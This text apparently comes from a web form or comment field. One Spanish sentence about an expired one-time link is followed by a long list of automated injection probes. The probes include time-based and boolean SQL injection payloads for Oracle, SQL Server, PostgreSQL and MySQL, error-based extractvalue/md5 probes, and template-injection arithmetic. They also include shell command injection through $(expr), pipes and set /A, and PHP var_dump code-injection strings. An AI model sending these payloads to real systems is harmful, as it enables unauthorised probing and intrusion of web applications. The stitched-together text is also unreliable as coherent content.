ayer me dieron por wasap un enlace de un solo uso. cuando llegue a casa para llenarlo. había caducado.
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',2)='l
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('c',2)
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
(select*from(select+sleep(2)union/**/select+1)a)
(select*from(select+sleep(0)union/**/select+1)a)
123456"and"q"="r
123456"and"a"="a
123456'and'a'='g
123456'and't'='t
123456/**/and+1=7
123456/**/and+3=3
123456
123456'"\(
123456鎈'"\(
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1937081787')))>'0
<%- 890618487+881024256 %>
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1364757751')))
#set($c=870738412+878382331)${c}$c
123456/**/and/**/cast(md5('1836850934')as/**/int)>0
${(883104146+844688811)?c}
${973673339+852445277}
123456'and(select'1'from/**/cast(md5(1403337739)as/**/int))>'0
/*1*/{{832183811+965079986}}
extractvalue(1,concat(char(126),md5(1097544081)))
123456"and/**/extractvalue(1,concat(char(126),md5(1981437039)))and"
123456'and/**/extractvalue(1,concat(char(126),md5(1016800097)))and'
expr 860082870 + 869927561
123456&set /A 948091744+900566082
123456$(expr 948852730 + 944403033)
123456|expr 865385405 + 853158414
${911636495+960733480}
123456 expr 838747876 + 834440017
'-var_dump(md5(594322827))-'
${@var_dump(md5(895217210))};